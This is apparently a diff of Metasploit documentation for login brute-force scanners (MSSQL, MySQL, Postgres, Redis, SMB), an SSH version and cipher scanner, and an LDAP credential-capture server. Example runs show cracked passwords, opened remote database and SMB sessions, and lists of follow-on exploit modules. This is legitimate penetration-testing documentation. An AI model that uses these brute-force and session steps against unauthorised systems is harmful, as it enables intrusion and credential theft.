+    ?                  Help menu
+    background         Backgrounds the current session
+    bg                 Alias for background
+    exit               Terminate the PostgreSQL session
+    help               Help menu
+    irb                Open an interactive Ruby shell on the current session
+    pry                Open the Pry debugger on the current session
+    sessions           Quickly switch to another session
+
+
+MSSQL Client Commands
+=====================
+
+    Command            Description
+    -------            -----------
+    query              Run a single SQL query
+    query_interactive  Enter an interactive prompt for running multiple SQL queri
+                       es
+
+
+Local File System Commands
+==========================
+
+    Command            Description
+    -------            -----------
+    getlwd             Print local working directory (alias for lpwd)
+    lcat               Read the contents of a local file to the screen
+    lcd                Change local working directory
+    ldir               List local files (alias for lls)
+    lls                List local files
+    lmkdir             Create new directory on local machine
+    lpwd               Print local working directory
+
+This session also works with the following modules:
+
+  auxiliary/admin/mssql/mssql_enum
+  auxiliary/admin/mssql/mssql_escalate_dbowner
+  auxiliary/admin/mssql/mssql_escalate_execute_as
+  auxiliary/admin/mssql/mssql_exec
+  auxiliary/admin/mssql/mssql_findandsampledata
+  auxiliary/admin/mssql/mssql_idf
+  auxiliary/admin/mssql/mssql_sql
+  auxiliary/admin/mssql/mssql_sql_file
+  auxiliary/scanner/mssql/mssql_hashdump
+  auxiliary/scanner/mssql/mssql_schemadump
+  exploit/windows/mssql/mssql_payload
+```
+
+To interact directly with the session as if in a SQL prompt, you can use the `query` command.
+
+```msf
+msf6 auxiliary(scanner/mssql/mssql_login) > sessions -i -1
+[*] Starting interaction with 2...
+
+mssql @ 192.168.2.242:1433 (master) > query -h
+Usage: query
+
+Run a single SQL query on the target.
+
+OPTIONS:
+
+    -h, --help      Help menu.
+    -i, --interact  Enter an interactive prompt for running multiple SQL queries
+
+Examples:
+
+    query select @@version;
+    query select user_name();
+    query select name from master.dbo.sysdatabases;
+
+mssql @ 192.168.2.242:1433 (master) > query 'select @@version;'
+Response
+========
+
+    #  NULL
+    -  ----
+    0  Microsoft SQL Server 2022 (RTM) - 16.0.1000.6 (X64)
+	Oct  8 2022 05:58:25
+	Copyright (C) 2022 Microsoft Corporation
+	Developer Edition (64-bit) on Windows Server 2022 Standard 10.0 <X64> (B
+       uild 20348: ) (Hypervisor)
+```
+
+Alternatively you can enter a SQL prompt via the `query_interactive` command which supports multiline commands:
+
+```msf
+mssql @ 192.168.2.242:1433 (master) > query_interactive -h
+Usage: query_interactive
+
+Go into an interactive SQL shell where SQL queries can be executed.
+To exit, type 'exit', 'quit', 'end' or 'stop'.
+
+mssql @ 192.168.2.242:1433 (master) > query_interactive
+[*] Starting interactive SQL shell for mssql @ 192.168.2.242:1433 (master)
+[*] SQL commands ending with ; will be executed on the remote server. Use the exit command to exit.
+
+SQL >> select top 2 table_catalog, table_schema
+SQL *> from information_schema.tables;
+[*] Executing query: select top 2 table_catalog, table_schema from information_schema.tables;
+Response
+========
+
+    #  table_catalog  table_schema
+    -  -------------  ------------
+    0  master         dbo
+    1  master         dbo
+
+SQL >>
+```
+
 ### USER_FILE

 File containing users, one per line.
@@ -24,7 +192,8 @@ File containing users, one per line.
 File containing passwords, one per line

 ## Scenarios
-```
+
+```msf
 msf > use scanner/mssql/mssql_login
 msf6 auxiliary(scanner/mssql/mssql_login) > set rhosts 127.0.0.1
 rhosts => 127.0.0.1
@@ -12,7 +12,7 @@ This auxiliary module is a brute-force login tool for MySQL servers.

 ## Scenarios

-```
+```msf
 msf > use auxiliary/scanner/mysql/mysql_login 
 msf auxiliary(mysql_login) > set PASS_FILE /tmp/passes.txt
 PASS_FILE => /tmp/passes.txt
@@ -61,3 +61,154 @@ msf auxiliary(mysql_login) > run
 [*] Auxiliary module execution completed
 msf auxiliary(mysql_login) >
 ```
+
+## Obtaining an Interactive Session
+
+The CreateSession option allows you to obtain an interactive session
+for the MySQL client you're connecting to. The run command with CreateSession
+set to true should give you an interactive session:
+
+```msf
+run rhost=127.0.0.1 rport=4306 username=root password=password createsession=true
+
+[+] 127.0.0.1:4306        - 127.0.0.1:4306 - Found remote MySQL version 11.2.2
+[+] 127.0.0.1:4306        - 127.0.0.1:4306 - Success: 'root:password'
+[*] MySQL session 1 opened (127.0.0.1:53241 -> 127.0.0.1:4306) at 2024-03-12 12:40:46 -0500
+[*] 127.0.0.1:4306        - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/mysql/mysql_login) > sessions -i -1
+[*] Starting interaction with 1...
+
+mysql @ 127.0.0.1:4306 >
+```
+
+You can interact with your new session using `sessions -i -1` or `sessions -i <session id>`.
+You can also use `help` to get more information about how to use your session.
+
+```msf
+msf6 auxiliary(scanner/mysql/mysql_login) > sessions
+
+Active sessions
+===============
+
+  Id  Name  Type   Information                      Connection
+  --  ----  ----   -----------                      ----------
+  2         mssql  MSSQL test @ 192.168.2.242:1433  192.168.2.1:61428 -> 192.168.2.242:1433 (192.168.2.242)
+  3         mysql  MySQL root @ 127.0.0.1:4306      127.0.0.1:61450 -> 127.0.0.1:4306 (127.0.0.1)
+
+msf6 auxiliary(scanner/mysql/mysql_login) > sessions -i 3
+[*] Starting interaction with 3...
+```
+
+When interacting with a session, the help command can be useful:
+
+```msf
+mysql @ 127.0.0.1:4306 > help
+
+Core Commands
+=============
+
+    Command            Description
+    -------            -----------
+    ?                  Help menu
+    background         Backgrounds the current session
+    bg                 Alias for background
+    exit               Terminate the PostgreSQL session
+    help               Help menu
+    irb                Open an interactive Ruby shell on the current session
+    pry                Open the Pry debugger on the current session
+    sessions           Quickly switch to another session
+
+
+MySQL Client Commands
+=====================
+
+    Command            Description
+    -------            -----------
+    query              Run a single SQL query
+    query_interactive  Enter an interactive prompt for running multiple SQL queries
+
+
+Local File System Commands
+==========================
+
+    Command            Description
+    -------            -----------
+    getlwd             Print local working directory (alias for lpwd)
+    lcat               Read the contents of a local file to the screen
+    lcd                Change local working directory
+    ldir               List local files (alias for lls)
+    lls                List local files
+    lmkdir             Create new directory on local machine
+    lpwd               Print local working directory
+
+This session also works with the following modules:
+
+  auxiliary/admin/mysql/mysql_enum
+  auxiliary/admin/mysql/mysql_sql
+  auxiliary/scanner/mysql/mysql_file_enum
+  auxiliary/scanner/mysql/mysql_hashdump
+  auxiliary/scanner/mysql/mysql_schemadump
+  auxiliary/scanner/mysql/mysql_version
+  auxiliary/scanner/mysql/mysql_writable_dirs
+  exploit/multi/mysql/mysql_udf_payload
+  exploit/windows/mysql/mysql_mof
+  exploit/windows/mysql/mysql_start_up
+```
+
+Once you've done that, you can run any MySQL query against the target using the `query` command:
+
+```msf
+mysql @ 127.0.0.1:4306 > query -h
+Usage: query
+
+Run a single SQL query on the target.
+
+OPTIONS:
+
+    -h, --help      Help menu.
+    -i, --interact  Enter an interactive prompt for running multiple SQL queries
+
+Examples:
+
+    query SHOW DATABASES;
+    query USE information_schema;
+    query SELECT * FROM SQL_FUNCTIONS;
+    query SELECT version();
+
+mysql @ 127.0.0.1:4306 > query 'SELECT version();'
+Response
+========
+
+    #  version()
+    -  ---------
+    0  11.2.2-MariaDB-1:11.2.2+maria~ubu2204
+```
+
+Alternatively you can enter a SQL prompt via the `query_interactive` command which supports multiline commands:
+
+```msf
+mysql @ 127.0.0.1:4306 > query_interactive -h
+Usage: query_interactive
+
+Go into an interactive SQL shell where SQL queries can be executed.
+To exit, type 'exit', 'quit', 'end' or 'stop'.
+
+mysql @ 127.0.0.1:4306 > query_interactive
+[*] Starting interactive SQL shell for mysql @ 127.0.0.1:4306
+[*] SQL commands ending with ; will be executed on the remote server. Use the exit command to exit.
+
+SQL >> SELECT table_name
+SQL *> FROM information_schema.tables
+SQL *> LIMIT 2;
+[*] Executing query: SELECT table_name FROM information_schema.tables LIMIT 2;
+Response
+========
+
+    #  table_name
+    -  ----------
+    0  ALL_PLUGINS
+    1  APPLICABLE_ROLES
+
+SQL >>
+```
@@ -0,0 +1,168 @@
+## Description
+
+This auxiliary module is a brute-force login tool for Postgres servers.
+
+## Verification Steps
+
+1. Do: `use auxiliary/scanner/postgres/postgres_login`
+2. Do: `set PASS_FILE [file containing passwords]`
+3. Do: `set RHOSTS [IP]`
+4. Do: `set USER_FILE [file containing usernames]`
+5. Do: `set DATABASE [template name]`
+6. Do: `run`
+
+The above USER_FILE and PASS_FILE options can be replaced with USERNAME
+and PASSWORD if you know the credentials.
+
+## Getting an Interactive Session
+
+The CreateSession option allows you to obtain an interactive session
+for the Postgres client you're connecting to. The run command with CreateSession
+set to true should give you an interactive session.
+
+For example:
+
+```msf
+msf6 auxiliary(scanner/postgres/postgres_login) > run rhost=127.0.0.1 rport=5432 username=postgres password=password database=template1 createsession=true
+```
+
+Should yield:
+
+```msf
+[+] 127.0.0.1:5432 - Login Successful: postgres:password@template1
+[*] PostgreSQL session 1 opened (127.0.0.1:61324 -> 127.0.0.1:5432) at 2024-03-15 14:00:12 -0500
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+You can interact with your session using `sessions -i -1` or `sessions <session id>`.
+Use the help command for more info.
+
+```msf
+msf6 auxiliary(scanner/postgres/postgres_login) > sessions
+
+Active sessions
+===============
+
+  Id  Name  Type        Information                           Connection
+  --  ----  ----        -----------                           ----------
+  1         postgresql  PostgreSQL postgres @ 127.0.0.1:5432  127.0.0.1:61324 -> 127.0.0.1:5432 (127.0.0.1)
+
+msf6 auxiliary(scanner/postgres/postgres_login) > sessions -i 1
+[*] Starting interaction with 1...
+```
+
+When interacting with a session, the help command can be useful:
+
+```msf
+postgresql @ 127.0.0.1:5432 (template1) > help
+
+Core Commands
+=============
+
+    Command            Description
+    -------            -----------
+    ?                  Help menu
+    background         Backgrounds the current session
+    bg                 Alias for background
+    exit               Terminate the PostgreSQL session
+    help               Help menu
+    irb                Open an interactive Ruby shell on the current session
+    pry                Open the Pry debugger on the current session
+    sessions           Quickly switch to another session
+
+
+PostgreSQL Client Commands
+==========================
+
+    Command            Description
+    -------            -----------
+    query              Run a single SQL query
+    query_interactive  Enter an interactive prompt for running multiple SQL queries
+
+
+Local File System Commands
+==========================
+
+    Command            Description
+    -------            -----------
+    getlwd             Print local working directory (alias for lpwd)
+    lcat               Read the contents of a local file to the screen
+    lcd                Change local working directory
+    ldir               List local files (alias for lls)
+    lls                List local files
+    lmkdir             Create new directory on local machine
+    lpwd               Print local working directory
+
+This session also works with the following modules:
+
+  auxiliary/admin/postgres/postgres_readfile
+  auxiliary/admin/postgres/postgres_sql
+  auxiliary/scanner/postgres/postgres_hashdump
+  auxiliary/scanner/postgres/postgres_schemadump
+  auxiliary/scanner/postgres/postgres_version
+  exploit/linux/postgres/postgres_payload
+  exploit/multi/postgres/postgres_copy_from_program_cmd_exec
+  exploit/multi/postgres/postgres_createlang
+  exploit/windows/postgres/postgres_payload
+```
+
+Once you've done that, you can run any Postgres query against the target using the `query` command:
+
+```msf
+postgresql @ 127.0.0.1:5432 (template1) > query -h
+Usage: query
+
+Run a single SQL query on the target.
+
+OPTIONS:
+
+    -h, --help      Help menu.
+    -i, --interact  Enter an interactive prompt for running multiple SQL queries
+
+Examples:
+
+    query SELECT user;
+    query SELECT version();
+    query SELECT * FROM pg_catalog.pg_tables;
+
+postgresql @ 127.0.0.1:5432 (template1) > query 'SELECT version();'
+[*] SELECT 1
+
+Response
+========
+
+    #  version
+    -  -------
+    0  PostgreSQL 14.1 on aarch64-apple-darwin20.6.0, compiled by Apple clang version 12.0.5 (clang-1205.0.22.9), 64-bit
+```
+
+Alternatively you can enter a SQL prompt via the `query_interactive` command which supports multiline commands:
+
+```msf
+postgresql @ 127.0.0.1:5432 (template1) > query_interactive -h
+Usage: query_interactive
+
+Go into an interactive SQL shell where SQL queries can be executed.
+To exit, type 'exit', 'quit', 'end' or 'stop'.
+
+postgresql @ 127.0.0.1:5432 (template1) > query_interactive
+[*] Starting interactive SQL shell for postgresql @ 127.0.0.1:5432 (template1)
+[*] SQL commands ending with ; will be executed on the remote server. Use the exit command to exit.
+
+SQL >> SELECT table_name
+SQL *>   FROM information_schema.tables
+SQL *>  LIMIT 2;
+[*] Executing query: SELECT table_name FROM information_schema.tables LIMIT 2;
+[*] SELECT 2
+
+Response
+========
+
+    #  table_name
+    -  ----------
+    0  pg_statistic
+    1  pg_type
+
+SQL >>
+```
@@ -4,10 +4,49 @@ database with optional durability. Redis supports different kinds of abstract da
 such as strings, lists, maps, sets, sorted sets, HyperLogLogs, bitmaps, streams, and spatial indexes.

 This module is login utility to find the password of the Redis server by bruteforcing the login portal.
-Note that Redis does not require a username to log in; login is done purely via supplying a valid password.

 A complete installation guide for Redis can be found [here](https://redis.io/topics/quickstart)

+### Redis Authentication
+
+Redis has several ways to support secure connections to the in-memory database:
+
+* Prior to Redis 6, the `requirepass` directive could be set, setting a master password for all connections.
+  This requires the usage of the `AUTH <password>` command before executing any commands on the cluster.
+* After Redis 6, the `requirepass` directive sets a password for the default user `default`
+  * The `AUTH` command now takes two arguments instead of one: `AUTH <username> <password>`
+  * The `AUTH` command still accepts a single arguments, but defaults to the user `default`
+
+## Setup
+
+Run redis in docker without auth:
+
+```
+docker run --rm -p 6379:6379 redis
+```
+
+Optionally setting the default password for the implicit `default` username account, connect to the running Redis instance and set a password:
+
+```
+$ nc 127.0.0.1 6379
+config set requirepass mypass
+OK
+```
+
+Optionally creating an enabled `test_user` user account with password `mypass` - if ACL is supported (Redis >= 6.0.0):
+
+```
+$ nc 127.0.0.1 6379
+ACL SETUSER test_user allkeys on +@string +@set -SADD >mypass
+```
+
+Optionally creating a disabled `test_user_disabled` user account with password `mypass` - if ACL is supported (Redis >= 6.0.0):
+
+```
+$ nc 127.0.0.1 6379
+ACL SETUSER test_user_disabled allkeys off +@string +@set -SADD >mypass
+```
+
 ## Verification Steps
 1. Do: `use auxiliary/scanner/redis/redis_login`
 2. Do: `set RHOSTS [ips]`
@@ -8,7 +8,7 @@ To use smb_login, make sure you are able to connect to a SMB service that suppor

 The following demonstrates a basic scenario of using the [built-in wordlists](https://github.com/rapid7/metasploit-framework/tree/master/data/wordlists) to brute-force SMB:

-```
+```msf
 msf > use auxiliary/scanner/smb/smb_login 
 msf auxiliary(smb_login) > set RHOSTS 192.168.1.80
 RHOSTS => 192.168.1.80
@@ -21,12 +21,12 @@ msf auxiliary(smb_login) > run
 [+] 192.168.1.80:445      - 192.168.1.80:445 SMB - Success: '.\root:monkey' Administrator
 [*] Scanned 1 of 1 hosts (100% complete)
 [*] Auxiliary module execution completed
-msf auxiliary(smb_login) > 
+msf auxiliary(smb_login) >
 ```

 If you have a database connected, you should also see this credential logged:

-```
+```msf
 msf auxiliary(smb_login) > creds
 Credentials
 ===========
@@ -35,10 +35,126 @@ host          origin        service        public  private  realm  private_type
 ----          ------        -------        ------  -------  -----  ------------
 192.168.1.80  192.168.1.80  445/tcp (smb)  root    monkey          Password

-msf auxiliary(smb_login) 
+msf auxiliary(smb_login) >
 ```

-## Options
+## Obtaining a Session
+
+When using the smb_login module, the CreateSession option can be used to obtain an interactive
+session within the smb instance. Running with the following options:
+
+```msf
+msf6 auxiliary(scanner/smb/smb_login) > run CreateSession=true RHOSTS=172.14.2.164 RPORT=445 SMBDomain=windomain.local SMBPass=password SMBUser=username
+```
+
+Should give you output containing:
+
+```msf
+[*] 172.14.2.164:445    - 172.14.2.164:445 - Starting SMB login bruteforce
+[+] 172.14.2.164:445    - 172.14.2.164:445 - Success: 'windomain.local\username:password' Administrator
+[*] SMB session 1 opened (172.16.158.1:62793 -> 172.14.2.164:445) at 2024-03-12 17:03:09 +0000
+[*] 172.14.2.164:445    - Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+msf6 auxiliary(scanner/smb/smb_login) > sessions -i -1
+[*] Starting interaction with 1...
+```
+
+Which you can interact with using `sessions -i <session id>` or `sessions -i -1` to interact with the most recently opened session.
+
+```msf
+msf6 auxiliary(scanner/smb/smb_login) > sessions -i -1
+[*] Starting interaction with 1...
+
+SMB (172.14.2.164) > shares
+Shares
+======
+
+    #  Name    Type          comment
+    -  ----    ----          -------
+    0  ADMIN$  DISK|SPECIAL  Remote Admin
+    1  C$      DISK|SPECIAL  Default share
+    2  foo     DISK
+    3  IPC$    IPC|SPECIAL   Remote IPC
+
+SMB (172.14.2.164) > shares -i foo
+[+] Successfully connected to foo
+SMB (172.14.2.164\foo) > ls
+ls
+===
+[truncated]
+```
+
+When interacting with a session, the help command can be useful:
+
+```msf
+SMB (172.14.2.164\foo) > help
+
+Core Commands
+=============
+
+    Command       Description
+    -------       -----------
+    ?             Help menu
+    background    Backgrounds the current session
+    bg            Alias for background
+    exit          Terminate the SMB session
+    help          Help menu
+    irb           Open an interactive Ruby shell on the current session
+    pry           Open the Pry debugger on the current session
+    sessions      Quickly switch to another session
+
+
+Shares Commands
+===============
+
+    Command       Description
+    -------       -----------
+    cat           Read the file at the given path
+    cd            Change the current remote working directory
+    delete        Delete a file
+    dir           List all files in the current directory (alias for ls)
+    download      Download a file
+    ls            List all files in the current directory
+    mkdir         Make a new directory
+    pwd           Print the current remote working directory
+    rmdir         Delete a directory
+    shares        View the available shares and interact with one
+    upload        Upload a file
+
+
+Local File System Commands
+==========================
+
+    Command       Description
+    -------       -----------
+    getlwd        Print local working directory (alias for lpwd)
+    lcat          Read the contents of a local file to the screen
+    lcd           Change local working directory
+    ldir          List local files (alias for lls)
+    lls           List local files
+    lmkdir        Create new directory on local machine
+    lpwd          Print local working directory
+
+This session also works with the following modules:
+
+  auxiliary/admin/dcerpc/icpr_cert
+  auxiliary/admin/dcerpc/samr_computer
+  auxiliary/admin/smb/delete_file
+  auxiliary/admin/smb/download_file
+  auxiliary/admin/smb/psexec_ntdsgrab
+  auxiliary/admin/smb/upload_file
+  auxiliary/gather/windows_secrets_dump
+  auxiliary/scanner/smb/pipe_auditor
+  auxiliary/scanner/smb/pipe_dcerpc_auditor
+  auxiliary/scanner/smb/smb_enum_gpp
+  auxiliary/scanner/smb/smb_enumshares
+  auxiliary/scanner/smb/smb_enumusers
+  auxiliary/scanner/smb/smb_enumusers_domain
+  auxiliary/scanner/smb/smb_lookupsid
+  exploit/windows/smb/psexec
+```
+
+## Credential Options

 By default, the smb_login module only requires the RHOSTS option to run. But in reality, you will
 also need to supply user names and passwords. The following options are available to support
@@ -1,34 +1,260 @@
-## Description
-
-SSH, Secure SHell, is an encrypted network protocol used to remotely interact with an Operating System at a command line level.  SSH is available on most every system, including Windows, but is mainly used by *nix administrators.
-
-This module identifies the version of SSH service in use by the server based on the server's banner. Any SSH server should return this information.
-
 ## Vulnerable Application

+SSH, Secure SHell, is an encrypted network protocol used to remotely interact with an Operating System at a command line level.
+SSH is available on most every system, including Windows, but is mainly used by *nix administrators.
+
+This module identifies the version of SSH service in use by the server based on the server's banner.
+Any SSH server should return this information. It also identifies the varous cryptographic settings
+and vulnerabilities associated with those.
+
 This module is tested on several different SSH services, such as:

 - Virtual testing environment: SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.8
 - `github.com`: SSH-2.0-babeld-38be96bc
 - `gitlab.com`: SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.8

+### Vulnerable Ubuntu 14.04.1
+
+The following `Dockerfile` can be used to create an Ubuntu 14.04.1 image with SSH running.
+
+```
+FROM ubuntu:14.04.1
+
+RUN apt-get update && apt-get -y install --no-install-recommends openssh-server=1:6.6p1-2ubuntu1 openssh-client=1:6.6p1-2ubuntu1 openssh-sftp-server=1:6.6p1-2ubuntu1
+RUN mkdir /var/run/sshd
+EXPOSE 22
+
+CMD ["/usr/sbin/sshd","-D"]
+```
+
 ## Verification Steps

  1. Do: `use auxiliary/scanner/ssh/ssh_version`
  2. Do: `set rhosts [ips]`
  3. Do: `run`

+## Options
+
+### EXTENDED_CHECKS
+
+Check for cryptographic issues. Defaults to `true`
+
 ## Scenarios

 ### SSH-2.0 on GitHub

-  ```
-msf5 auxiliary(scanner/ssh/ssh_version) > use auxiliary/scanner/ssh/ssh_version
+```
+msf5 > use auxiliary/scanner/ssh/ssh_version
 msf5 auxiliary(scanner/ssh/ssh_version) > set RHOSTS github.com
 RHOSTS => github.com
 msf5 auxiliary(scanner/ssh/ssh_version) > run

-[+] 140.82.118.4:22       - SSH server version: SSH-2.0-babeld-38be96bc
-[*] github.com:22         - Scanned 1 of 1 hosts (100% complete)
+[*] 140.82.113.4 - Key Fingerprint: ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIOMqqnkVzrm0SdG6UOoqKLsabgH5C9okWi0dh2l9GKJl
+[*] 140.82.113.4 - SSH server version: SSH-2.0-babeld-8405f9f3
+[*] 140.82.113.4 - Server Information and Encryption
+=================================
+
+  Type                           Value                                 Note
+  ----                           -----                                 ----
+  encryption.compression         none
+  encryption.compression         zlib@openssh.com
+  encryption.compression         zlib
+  encryption.encryption          chacha20-poly1305@openssh.com
+  encryption.encryption          aes256-gcm@openssh.com
+  encryption.encryption          aes128-gcm@openssh.com
+  encryption.encryption          aes256-ctr
+  encryption.encryption          aes192-ctr
+  encryption.encryption          aes128-ctr
+  encryption.hmac                hmac-sha2-512-etm@openssh.com
+  encryption.hmac                hmac-sha2-256-etm@openssh.com
+  encryption.hmac                hmac-sha2-512
+  encryption.hmac                hmac-sha2-256
+  encryption.host_key            ssh-ed25519
+  encryption.host_key            ecdsa-sha2-nistp256                   Weak elliptic curve
+  encryption.host_key            rsa-sha2-512
+  encryption.host_key            rsa-sha2-256
+  encryption.host_key            ssh-rsa
+  encryption.key_exchange        curve25519-sha256
+  encryption.key_exchange        curve25519-sha256@libssh.org
+  encryption.key_exchange        ecdh-sha2-nistp256
+  encryption.key_exchange        ecdh-sha2-nistp384
+  encryption.key_exchange        ecdh-sha2-nistp521
+  encryption.key_exchange        diffie-hellman-group-exchange-sha256
+  encryption.key_exchange        kex-strict-s-v00@openssh.com
+
+[*] Scanned 1 of 1 hosts (100% complete)
 [*] Auxiliary module execution completed
-  ```
+```
+
+### Docker image
+
+```
+msf5 > use auxiliary/scanner/ssh/ssh_version
+msf6 auxiliary(scanner/ssh/ssh_version) > set rhosts 172.17.0.2
+rhosts => 172.17.0.2
+msf6 auxiliary(scanner/ssh/ssh_version) > set verbose true
+verbose => true
+msf6 auxiliary(scanner/ssh/ssh_version) > run
+
+[*] 172.17.0.2 - Key Fingerprint: ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIG52hWkobwr57akGxiK6eeMN9/M5MH+sQsNPv8Mci049
+[*] 172.17.0.2 - SSH server version: SSH-2.0-OpenSSH_6.6p1 Ubuntu-2ubuntu1
+[+] 172.17.0.2 - Key Exchange (kex) diffie-hellman-group-exchange-sha1 is deprecated and should not be used.
+[+] 172.17.0.2 - Key Exchange (kex) diffie-hellman-group1-sha1 is deprecated and should not be used.
+[+] 172.17.0.2 - Host Key Encryption ecdsa-sha2-nistp256 uses a weak elliptic curve and should not be used.
+[+] 172.17.0.2 - HMAC hmac-md5 is deprecated and should not be used.
+[+] 172.17.0.2 - HMAC hmac-ripemd160 is deprecated and should not be used.
+[+] 172.17.0.2 - HMAC hmac-sha1-96 is deprecated and should not be used.
+[+] 172.17.0.2 - HMAC hmac-md5-96 is deprecated and should not be used.
+[+] 172.17.0.2 - Encryption arcfour256 is deprecated and should not be used.
+[+] 172.17.0.2 - Encryption arcfour128 is deprecated and should not be used.
+[+] 172.17.0.2 - Encryption aes128-cbc is deprecated and should not be used.
+[+] 172.17.0.2 - Encryption 3des-cbc is deprecated and should not be used.
+[+] 172.17.0.2 - Encryption blowfish-cbc is deprecated and should not be used.
+[+] 172.17.0.2 - Encryption cast128-cbc is deprecated and should not be used.
+[+] 172.17.0.2 - Encryption aes192-cbc is deprecated and should not be used.
+[+] 172.17.0.2 - Encryption aes256-cbc is deprecated and should not be used.
+[+] 172.17.0.2 - Encryption arcfour is deprecated and should not be used.
+[+] 172.17.0.2 - Encryption rijndael-cbc@lysator.liu.se is deprecated and should not be used.
+[*] 172.17.0.2 - Server Information and Encryption
+=================================
+
+  Type                           Value                                 Note
+  ----                           -----                                 ----
+  encryption.compression         none
+  encryption.compression         zlib@openssh.com
+  encryption.encryption          aes128-ctr
+  encryption.encryption          aes192-ctr
+  encryption.encryption          aes256-ctr
+  encryption.encryption          arcfour256                            Deprecated
+  encryption.encryption          arcfour128                            Deprecated
+  encryption.encryption          aes128-gcm@openssh.com
+  encryption.encryption          aes256-gcm@openssh.com
+  encryption.encryption          chacha20-poly1305@openssh.com
+  encryption.encryption          aes128-cbc                            Deprecated
+  encryption.encryption          3des-cbc                              Deprecated
+  encryption.encryption          blowfish-cbc                          Deprecated
+  encryption.encryption          cast128-cbc                           Deprecated
+  encryption.encryption          aes192-cbc                            Deprecated
+  encryption.encryption          aes256-cbc                            Deprecated
+  encryption.encryption          arcfour                               Deprecated
+  encryption.encryption          rijndael-cbc@lysator.liu.se           Deprecated
+  encryption.hmac                hmac-md5-etm@openssh.com
+  encryption.hmac                hmac-sha1-etm@openssh.com
+  encryption.hmac                umac-64-etm@openssh.com
+  encryption.hmac                umac-128-etm@openssh.com
+  encryption.hmac                hmac-sha2-256-etm@openssh.com
+  encryption.hmac                hmac-sha2-512-etm@openssh.com
+  encryption.hmac                hmac-ripemd160-etm@openssh.com
+  encryption.hmac                hmac-sha1-96-etm@openssh.com
+  encryption.hmac                hmac-md5-96-etm@openssh.com
+  encryption.hmac                hmac-md5                              Deprecated
+  encryption.hmac                hmac-sha1
+  encryption.hmac                umac-64@openssh.com
+  encryption.hmac                umac-128@openssh.com
+  encryption.hmac                hmac-sha2-256
+  encryption.hmac                hmac-sha2-512
+  encryption.hmac                hmac-ripemd160                        Deprecated
+  encryption.hmac                hmac-ripemd160@openssh.com
+  encryption.hmac                hmac-sha1-96                          Deprecated
+  encryption.hmac                hmac-md5-96                           Deprecated
+  encryption.host_key            ssh-rsa
+  encryption.host_key            ssh-dss
+  encryption.host_key            ecdsa-sha2-nistp256                   Weak elliptic curve
+  encryption.host_key            ssh-ed25519
+  encryption.key_exchange        curve25519-sha256@libssh.org
+  encryption.key_exchange        ecdh-sha2-nistp256
+  encryption.key_exchange        ecdh-sha2-nistp384
+  encryption.key_exchange        ecdh-sha2-nistp521
+  encryption.key_exchange        diffie-hellman-group-exchange-sha256
+  encryption.key_exchange        diffie-hellman-group-exchange-sha1    Deprecated
+  encryption.key_exchange        diffie-hellman-group14-sha1
+  encryption.key_exchange        diffie-hellman-group1-sha1            Deprecated
+  fingerprint_db                 ssh.banner
+  openssh.comment                Ubuntu-2ubuntu1
+  os.cpe23                       cpe:/o:canonical:ubuntu_linux:14.04
+  os.family                      Linux
+  os.product                     Linux
+  os.vendor                      Ubuntu
+  os.version                     14.04
+  service.cpe23                  cpe:/a:openbsd:openssh:6.6p1
+  service.family                 OpenSSH
+  service.product                OpenSSH
+  service.protocol               ssh
+  service.vendor                 OpenBSD
+  service.version                6.6p1
+
+[*] Scanned 1 of 1 hosts (100% complete)
+[*] Auxiliary module execution completed
+```
+
+## Confirming using NMAP
+
+Utilizing the [ssh2-enum-algos](https://nmap.org/nsedoc/scripts/ssh2-enum-algos.html) NMAP script.
+
+```
+Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-11 14:55 EST
+Nmap scan report for 172.17.0.2
+Host is up (0.000099s latency).
+
+PORT   STATE SERVICE VERSION
+22/tcp open  ssh     OpenSSH 6.6p1 Ubuntu 2ubuntu1 (Ubuntu Linux; protocol 2.0)
+| ssh2-enum-algos: 
+|   kex_algorithms: (8)
+|       curve25519-sha256@libssh.org
+|       ecdh-sha2-nistp256
+|       ecdh-sha2-nistp384
+|       ecdh-sha2-nistp521
+|       diffie-hellman-group-exchange-sha256
+|       diffie-hellman-group-exchange-sha1
+|       diffie-hellman-group14-sha1
+|       diffie-hellman-group1-sha1
+|   server_host_key_algorithms: (4)
+|       ssh-rsa
+|       ssh-dss
+|       ecdsa-sha2-nistp256
+|       ssh-ed25519
+|   encryption_algorithms: (16)
+|       aes128-ctr
+|       aes192-ctr
+|       aes256-ctr
+|       arcfour256
+|       arcfour128
+|       aes128-gcm@openssh.com
+|       aes256-gcm@openssh.com
+|       chacha20-poly1305@openssh.com
+|       aes128-cbc
+|       3des-cbc
+|       blowfish-cbc
+|       cast128-cbc
+|       aes192-cbc
+|       aes256-cbc
+|       arcfour
+|       rijndael-cbc@lysator.liu.se
+|   mac_algorithms: (19)
+|       hmac-md5-etm@openssh.com
+|       hmac-sha1-etm@openssh.com
+|       umac-64-etm@openssh.com
+|       umac-128-etm@openssh.com
+|       hmac-sha2-256-etm@openssh.com
+|       hmac-sha2-512-etm@openssh.com
+|       hmac-ripemd160-etm@openssh.com
+|       hmac-sha1-96-etm@openssh.com
+|       hmac-md5-96-etm@openssh.com
+|       hmac-md5
+|       hmac-sha1
+|       umac-64@openssh.com
+|       umac-128@openssh.com
+|       hmac-sha2-256
+|       hmac-sha2-512
+|       hmac-ripemd160
+|       hmac-ripemd160@openssh.com
+|       hmac-sha1-96
+|       hmac-md5-96
+|   compression_algorithms: (2)
+|       none
+|_      zlib@openssh.com
+Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
+
+Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+Nmap done: 1 IP address (1 host up) scanned in 0.22 seconds
+```
@@ -0,0 +1,52 @@
+
+## Vulnerable Application
+
+This module emulates an LDAP Server which accepts User Bind Request to capture the User Credentials.
+Upon receiving successful Bind Request, a `ldap_bind: Authentication method not supported (7)` error is sent to the User
+
+## Verification Steps
+
+1. Start msfconsole
+2. Do: `use auxiliary/server/capture/ldap`
+3. Do: `run`
+4. From a new shell or workstation, perform a ldap bind request involving User credentials.
+5. Check the database using `creds` for the user authentication information.
+
+## Options
+
+  **Authentication**
+  
+The type of LDAP authentication to capture. The default type is `Simple`
